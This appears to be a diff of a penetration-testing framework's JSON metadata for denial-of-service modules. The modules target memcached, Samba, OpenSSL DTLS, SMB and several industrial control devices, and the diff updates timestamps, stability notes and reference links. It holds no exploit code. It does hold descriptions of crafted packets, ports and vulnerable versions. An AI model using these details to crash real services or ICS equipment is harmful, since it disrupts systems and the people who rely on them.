+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/misc/ibm_tsm_dos.rb",
"is_install_path": true,
"ref_name": "dos/misc/ibm_tsm_dos",
@@ -15805,26 +15702,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/misc/memcached": {
"name": "Memcached Remote Denial of Service",
"fullname": "auxiliary/dos/misc/memcached",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Gregory Man "
],
- "description": "This module sends a specially-crafted packet to cause a\n segmentation fault in memcached v1.4.15 or earlier versions.",
+ "description": "This module sends a specially-crafted packet to cause a\n segmentation fault in memcached v1.4.15 or earlier versions.",
"references": [
"URL-https://code.google.com/archive/p/memcached/issues/192",
"CVE-2011-4971",
@@ -15833,14 +15731,10 @@
"platform": "",
"arch": "",
"rport": 11211,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/misc/memcached.rb",
"is_install_path": true,
"ref_name": "dos/misc/memcached",
@@ -15848,26 +15742,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/ntp/ntpd_reserved_dos": {
"name": "NTP.org ntpd Reserved Mode Denial of Service",
"fullname": "auxiliary/dos/ntp/ntpd_reserved_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-10-04",
"type": "auxiliary",
"author": [
"todb "
],
- "description": "This module exploits a denial of service vulnerability\n within the NTP (network time protocol) demon. By sending\n a single packet to a vulnerable ntpd server (Victim A),\n spoofed from the IP address of another vulnerable ntpd server\n (Victim B), both victims will enter an infinite response loop.\n Note, unless you control the spoofed source host or the real\n remote host(s), you will not be able to halt the DoS condition\n once begun!",
+ "description": "This module exploits a denial of service vulnerability\n within the NTP (network time protocol) demon. By sending\n a single packet to a vulnerable ntpd server (Victim A),\n spoofed from the IP address of another vulnerable ntpd server\n (Victim B), both victims will enter an infinite response loop.\n Note, unless you control the spoofed source host or the real\n remote host(s), you will not be able to halt the DoS condition\n once begun!",
"references": [
"BID-37255",
"CVE-2009-3563",
@@ -15877,14 +15772,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb",
"is_install_path": true,
"ref_name": "dos/ntp/ntpd_reserved_dos",
@@ -15892,26 +15783,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/pptp/ms02_063_pptp_dos": {
"name": "MS02-063 PPTP Malformed Control Data Kernel Denial of Service",
"fullname": "auxiliary/dos/pptp/ms02_063_pptp_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2002-09-26",
"type": "auxiliary",
"author": [
"aushack "
],
- "description": "This module exploits a kernel based overflow when sending abnormal PPTP Control Data\n packets\tto Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers\n (Remote Access Services). Kernel memory is overwritten resulting in a BSOD.\n Code execution may be possible however this module is only a DoS.",
+ "description": "This module exploits a kernel based overflow when sending abnormal PPTP Control Data\n packets\tto Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers\n (Remote Access Services). Kernel memory is overwritten resulting in a BSOD.\n Code execution may be possible however this module is only a DoS.",
"references": [
"BID-5807",
"CVE-2002-1214",
@@ -15921,14 +15813,10 @@
"platform": "",
"arch": "",
"rport": 1723,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb",
"is_install_path": true,
"ref_name": "dos/pptp/ms02_063_pptp_dos",
@@ -15936,19 +15824,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-os-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/rpc/rpcbomb": {
"name": "RPC DoS targeting *nix rpcbind/libtirpc",
"fullname": "auxiliary/dos/rpc/rpcbomb",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -15956,7 +15845,7 @@
"guidovranken",
"Pearce Barry "
],
- "description": "This module exploits a vulnerability in certain versions of\n rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger\n large (and never freed) memory allocations for XDR strings on\n the target.",
+ "description": "This module exploits a vulnerability in certain versions of\n rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger\n large (and never freed) memory allocations for XDR strings on\n the target.",
"references": [
"CVE-2017-8779",
"BID-98325",
@@ -15965,14 +15854,10 @@
"platform": "",
"arch": "",
"rport": 111,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/rpc/rpcbomb.rb",
"is_install_path": true,
"ref_name": "dos/rpc/rpcbomb",
@@ -15980,26 +15865,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/samba/lsa_addprivs_heap": {
"name": "Samba lsa_io_privilege_set Heap Overflow",
"fullname": "auxiliary/dos/samba/lsa_addprivs_heap",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.",
+ "description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.",
"references": [
"CVE-2007-2446",
"OSVDB-34699"
@@ -16016,7 +15902,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb",
"is_install_path": true,
"ref_name": "dos/samba/lsa_addprivs_heap",
@@ -16024,26 +15910,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/samba/lsa_transnames_heap": {
"name": "Samba lsa_io_trans_names Heap Overflow",
"fullname": "auxiliary/dos/samba/lsa_transnames_heap",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.",
+ "description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.",
"references": [
"CVE-2007-2446",
"OSVDB-34699"
@@ -16060,7 +15947,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/samba/lsa_transnames_heap.rb",
"is_install_path": true,
"ref_name": "dos/samba/lsa_transnames_heap",
@@ -16068,19 +15955,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/samba/read_nttrans_ea_list": {
"name": "Samba read_nttrans_ea_list Integer Overflow",
"fullname": "auxiliary/dos/samba/read_nttrans_ea_list",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -16088,7 +15976,7 @@
"Jeremy Allison",
"dz_lnly"
],
- "description": "Integer overflow in the read_nttrans_ea_list function in nttrans.c in\n smbd in Samba 3.x before 3.5.22, 3.6.x before 3.6.17, and 4.x before\n 4.0.8 allows remote attackers to cause a denial of service (memory\n consumption) via a malformed packet. Important Note: in order to work,\n the \"ea support\" option on the target share must be enabled.",
+ "description": "Integer overflow in the read_nttrans_ea_list function in nttrans.c in\n smbd in Samba 3.x before 3.5.22, 3.6.x before 3.6.17, and 4.x before\n 4.0.8 allows remote attackers to cause a denial of service (memory\n consumption) via a malformed packet. Important Note: in order to work,\n the \"ea support\" option on the target share must be enabled.",
"references": [
"OSVDB-95969",
"BID-61597",
@@ -16107,7 +15995,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2021-01-28 10:35:25 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb",
"is_install_path": true,
"ref_name": "dos/samba/read_nttrans_ea_list",
@@ -16115,19 +16003,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/sap/sap_soap_rfc_eps_delete_file": {
"name": "SAP SOAP EPS_DELETE_FILE File Deletion",
"fullname": "auxiliary/dos/sap/sap_soap_rfc_eps_delete_file",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -16160,7 +16049,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb",
"is_install_path": true,
"ref_name": "dos/sap/sap_soap_rfc_eps_delete_file",
@@ -16168,19 +16057,20 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/scada/allen_bradley_pccc": {
"name": "DoS Exploitation of Allen-Bradley's Legacy Protocol (PCCC)",
"fullname": "auxiliary/dos/scada/allen_bradley_pccc",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -16193,19 +16083,15 @@
"references": [
"CVE-2017-7924",
"URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-17-138-03",
- "URL-https://dl.acm.org/doi/10.1145/3174776.3174780"
+ "URL-https://web.archive.org/web/20250116210051/https://dl.acm.org/doi/10.1145/3174776.3174780"
],
"platform": "",
"arch": "",
"rport": 44818,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/scada/allen_bradley_pccc.rb",
"is_install_path": true,
"ref_name": "dos/scada/allen_bradley_pccc",
@@ -16213,19 +16099,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/scada/beckhoff_twincat": {
"name": "Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS",
"fullname": "auxiliary/dos/scada/beckhoff_twincat",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-09-13",
"type": "auxiliary",
@@ -16233,7 +16120,7 @@
"Luigi Auriemma",
"jfa"
],
- "description": "The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending\n a crafted UDP packet to port 48899 (TCATSysSrv.exe).",
+ "description": "The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending\n a crafted UDP packet to port 48899 (TCATSysSrv.exe).",
"references": [
"CVE-2011-3486",
"OSVDB-75495",
@@ -16242,14 +16129,10 @@
"platform": "",
"arch": "",
"rport": 48899,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/scada/beckhoff_twincat.rb",
"is_install_path": true,
"ref_name": "dos/scada/beckhoff_twincat",
@@ -16257,19 +16140,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/scada/d20_tftp_overflow": {
"name": "General Electric D20ME TFTP Server Buffer Overflow DoS",
"fullname": "auxiliary/dos/scada/d20_tftp_overflow",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-01-19",
"type": "auxiliary",
@@ -16277,21 +16161,17 @@
"K. Reid Wightman ",
"todb "
],
- "description": "By sending a malformed TFTP request to the GE D20ME, it is possible to crash the\n device.\n\n This module is based on the original 'd20ftpbo.rb' Basecamp module from\n DigitalBond.",
+ "description": "By sending a malformed TFTP request to the GE D20ME, it is possible to crash the\n device.\n\n This module is based on the original 'd20ftpbo.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 69,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2021-01-28 10:35:25 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/scada/d20_tftp_overflow.rb",
"is_install_path": true,
"ref_name": "dos/scada/d20_tftp_overflow",
@@ -16299,26 +16179,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/scada/igss9_dataserver": {
"name": "7-Technologies IGSS 9 IGSSdataServer.exe DoS",
"fullname": "auxiliary/dos/scada/igss9_dataserver",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-12-20",
"type": "auxiliary",
"author": [
"jfa"
],
- "description": "The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be\n brought down by sending a crafted TCP packet to port 12401. This should also work\n for version <= 9.0.0.1120, but that version hasn't been tested.",
+ "description": "The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be\n brought down by sending a crafted TCP packet to port 12401. This should also work\n for version <= 9.0.0.1120, but that version hasn't been tested.",
"references": [
"CVE-2011-4050",
"OSVDB-77976",
@@ -16327,14 +16208,10 @@
"platform": "",
"arch": "",
"rport": 12401,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/scada/igss9_dataserver.rb",
"is_install_path": true,
"ref_name": "dos/scada/igss9_dataserver",
@@ -16342,41 +16219,39 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/scada/siemens_siprotec4": {
"name": "Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service",
"fullname": "auxiliary/dos/scada/siemens_siprotec4",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"M. Can Kurnaz"
],
- "description": "This module sends a specially crafted packet to port 50000/UDP\n causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.\n A manual reboot is required to return the device to service.\n CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.",
+ "description": "This module sends a specially crafted packet to port 50000/UDP\n causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.\n A manual reboot is required to return the device to service.\n CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.",
"references": [
+ "CVE-2015-5374",
"EDB-44103",
"URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-15-202-01"
],
"platform": "",
"arch": "",
"rport": 50000,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/scada/siemens_siprotec4.rb",
"is_install_path": true,
"ref_name": "dos/scada/siemens_siprotec4",
@@ -16384,19 +16259,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/scada/yokogawa_logsvr": {
"name": "Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow",
"fullname": "auxiliary/dos/scada/yokogawa_logsvr",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-03-10",
"type": "auxiliary",
@@ -16404,23 +16280,19 @@
"juan vazquez ",
"Redsadic "
],
- "description": "This module abuses a buffer overflow vulnerability to trigger a Denial of Service\n of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability\n exists in the handling of malformed log packets, with an unexpected long level field.\n The root cause of the vulnerability is a combination of usage of uninitialized memory\n from the stack and a dangerous string copy. This module has been tested successfully\n on Yokogawa CENTUM CS 3000 R3.08.50.",
+ "description": "This module abuses a buffer overflow vulnerability to trigger a Denial of Service\n of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability\n exists in the handling of malformed log packets, with an unexpected long level field.\n The root cause of the vulnerability is a combination of usage of uninitialized memory\n from the stack and a dangerous string copy. This module has been tested successfully\n on Yokogawa CENTUM CS 3000 R3.08.50.",
"references": [
"URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
- "URL-https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/",
+ "URL-https://web.archive.org/web/20221209030848/https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/",
"CVE-2014-0781"
],
"platform": "",
"arch": "",
"rport": 52302,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb",
"is_install_path": true,
"ref_name": "dos/scada/yokogawa_logsvr",
@@ -16428,19 +16300,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/smb/smb_loris": {
"name": "SMBLoris NBSS Denial of Service",
"fullname": "auxiliary/dos/smb/smb_loris",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2017-06-29",
"type": "auxiliary",
@@ -16448,7 +16321,7 @@
"thelightcosine",
"Adam Cammack "
],
- "description": "The SMBLoris attack consumes large chunks of memory in the target by sending\n SMB requests with the NetBios Session Service(NBSS) Length Header value set\n to the maximum possible value. By keeping these connections open and initiating\n large numbers of these sessions, the memory does not get freed, and the server\n grinds to a halt. This vulnerability was originally disclosed by Sean Dillon\n and Zach Harding.\n\n DISCALIMER: This module opens a lot of simultaneous connections. Please check\n your system's ULIMIT to make sure it can handle it. This module will also run\n continuously until stopped.",
+ "description": "The SMBLoris attack consumes large chunks of memory in the target by sending\n SMB requests with the NetBios Session Service(NBSS) Length Header value set\n to the maximum possible value. By keeping these connections open and initiating\n large numbers of these sessions, the memory does not get freed, and the server\n grinds to a halt. This vulnerability was originally disclosed by Sean Dillon\n and Zach Harding.\n\n DISCLAIMER: This module opens a lot of simultaneous connections. Please check\n your system's ULIMIT to make sure it can handle it. This module will also run\n continuously until stopped.",
"references": [
"URL-https://web.archive.org/web/20170804072329/https://smbloris.com/",
"AKA-SMBLoris"
@@ -16456,41 +16329,32 @@
"platform": "",
"arch": "",
"rport": 445,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-15 19:21:57 +0000",
"path": "/modules/auxiliary/dos/smb/smb_loris.rb",
"is_install_path": true,
"ref_name": "dos/smb/smb_loris",
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/smtp/sendmail_prescan": {
"name": "Sendmail SMTP Address prescan Memory Corruption",
"fullname": "auxiliary/dos/smtp/sendmail_prescan",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2003-09-17",
"type": "auxiliary",
"author": [
"aushack "
],
- "description": "This is a proof of concept denial of service module for Sendmail versions\n 8.12.8 and earlier. The vulnerability is within the prescan() method when\n parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00\n bytes can be used, limiting the likelihood for arbitrary code execution.",
+ "description": "This is a proof of concept denial of service module for Sendmail versions\n 8.12.8 and earlier. The vulnerability is within the prescan() method when\n parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00\n bytes can be used, limiting the likelihood for arbitrary code execution.",
"references": [
"OSVDB-2577",
"CVE-2003-0694",
@@ -16513,7 +16377,7 @@
"smtps"
],
"targets": null,
- "mod_time": "2023-01-04 14:45:58 +0000",
+ "mod_time": "2025-06-02 16:05:31 +0000",
"path": "/modules/auxiliary/dos/smtp/sendmail_prescan.rb",
"is_install_path": true,
"ref_name": "dos/smtp/sendmail_prescan",
@@ -16521,19 +16385,23 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "AKA": [
+ "EARLYSHOVEL"
+ ],
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/solaris/lpd/cascade_delete": {
"name": "Solaris LPD Arbitrary File Delete",
"fullname": "auxiliary/dos/solaris/lpd/cascade_delete",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -16541,7 +16409,7 @@
"hdm ",
"Optyx "
],
- "description": "This module uses a vulnerability in the Solaris line printer\n daemon to delete arbitrary files on an affected system. This\n can be used to exploit the rpc.walld format string flaw, the\n missing krb5.conf authentication bypass, or simply delete\n system files. Tested on Solaris 2.6, 7, 8, 9, and 10.",
+ "description": "This module uses a vulnerability in the Solaris line printer\n daemon to delete arbitrary files on an affected system. This\n can be used to exploit the rpc.walld format string flaw, the\n missing krb5.conf authentication bypass, or simply delete\n system files. Tested on Solaris 2.6, 7, 8, 9, and 10.",
"references": [
"CVE-2005-4797",
"BID-14510",
@@ -16550,14 +16418,10 @@
"platform": "",
"arch": "",
"rport": 515,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb",
"is_install_path": true,
"ref_name": "dos/solaris/lpd/cascade_delete",
@@ -16565,19 +16429,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "service-resource-loss"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/ssl/dtls_changecipherspec": {
"name": "OpenSSL DTLS ChangeCipherSpec Remote DoS",
"fullname": "auxiliary/dos/ssl/dtls_changecipherspec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2000-04-26",
"type": "auxiliary",
@@ -16585,7 +16450,7 @@
"Jon Oberheide ",
"theLightCosine "
],
- "description": "This module performs a Denial of Service Attack against Datagram TLS in OpenSSL\n version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a\n ChangeCipherspec Datagram before a ClientHello.",
+ "description": "This module performs a Denial of Service Attack against Datagram TLS in OpenSSL\n version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a\n ChangeCipherspec Datagram before a ClientHello.",
"references": [
"CVE-2009-1386",
"OSVDB-55073"
@@ -16593,14 +16458,10 @@
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb",
"is_install_path": true,
"ref_name": "dos/ssl/dtls_changecipherspec",
@@ -16608,19 +16469,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/ssl/dtls_fragment_overflow": {
"name": "OpenSSL DTLS Fragment Buffer Overflow DoS",
"fullname": "auxiliary/dos/ssl/dtls_fragment_overflow",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-06-05",
"type": "auxiliary",
@@ -16628,25 +16490,21 @@
"Juri Aedla ",
"Jon Hart "
],
- "description": "This module performs a Denial of Service Attack against Datagram TLS in\n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.\n This occurs when a DTLS ClientHello message has multiple fragments and the\n fragment lengths of later fragments are larger than that of the first, a\n buffer overflow occurs, causing a DoS.",
+ "description": "This module performs a Denial of Service Attack against Datagram TLS in\n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.\n This occurs when a DTLS ClientHello message has multiple fragments and the\n fragment lengths of later fragments are larger than that of the first, a\n buffer overflow occurs, causing a DoS.",
"references": [
"CVE-2014-0195",
"ZDI-14-173",
"BID-67900",
- "URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002",
- "URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048"
+ "URL-http://web.archive.org/web/20150815024234/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002",
+ "URL-http://web.archive.org/web/20140707160621/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048"
],
"platform": "",
"arch": "",
"rport": 4433,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb",
"is_install_path": true,
"ref_name": "dos/ssl/dtls_fragment_overflow",
@@ -16654,26 +16512,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
